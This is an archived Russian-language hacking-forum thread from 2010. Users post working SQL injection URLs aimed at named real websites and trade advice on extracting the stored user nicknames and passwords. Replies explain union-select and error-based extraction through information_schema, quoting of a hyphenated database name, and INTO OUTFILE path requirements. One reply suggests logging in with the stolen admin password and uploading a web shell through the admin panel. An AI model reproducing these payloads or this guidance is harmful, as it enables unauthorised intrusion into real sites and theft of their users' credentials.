ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2010, 15:27
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Вот есть инъекция:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,NickName,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,12+from+fusers+--+
При таком вводе отображаются ники и пассы юзеров. Хочу спросить это отображаются все юзеры? При вводе LIMIT вообще ничего нет.
И как слить базу этих пользователей? |
|
|
13.03.2010, 15:30
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от YuNi|[c
ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
|
|
|
|
13.03.2010, 15:49
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
есть скуля. хочу вытянуть пароли от форума, но имя бд где лежат пассы содержит -. когда делаю запрос from db-forum.forum_user,то выдает синтаксическую ошибку( можно всё таки как-то вытащить пассы?
UPD: решил, `db-forum`.forum_user
Последний раз редактировалось .:[melkiy]:.; 13.03.2010 в 15:58..
|
|
|
|
13.03.2010, 16:07
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
|
|
|
|
13.03.2010, 16:24
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от CyberHunter
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
нет прав или не туда льешь.
|
|
|
|
13.03.2010, 16:28
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
нет прав или не туда льешь.
Что можно сделать в таком случае?
|
|
|
|
13.03.2010, 16:29
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от CyberHunter
Что можно сделать в таком случае?
вытаскивать пас админа зайти под его учеткой и пробовать лить шел через админку...
|
|
|
|
13.03.2010, 16:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
При INTO OUTFILE надо использовать полный путь.
|
|
|
|
13.03.2010, 16:39
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
|
|
|
|
13.03.2010, 16:42
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от CyberHunter
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
скриптом каким нить сдампи структуру.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1977309){kind=avatar}
Похожие темы
Линейный вид
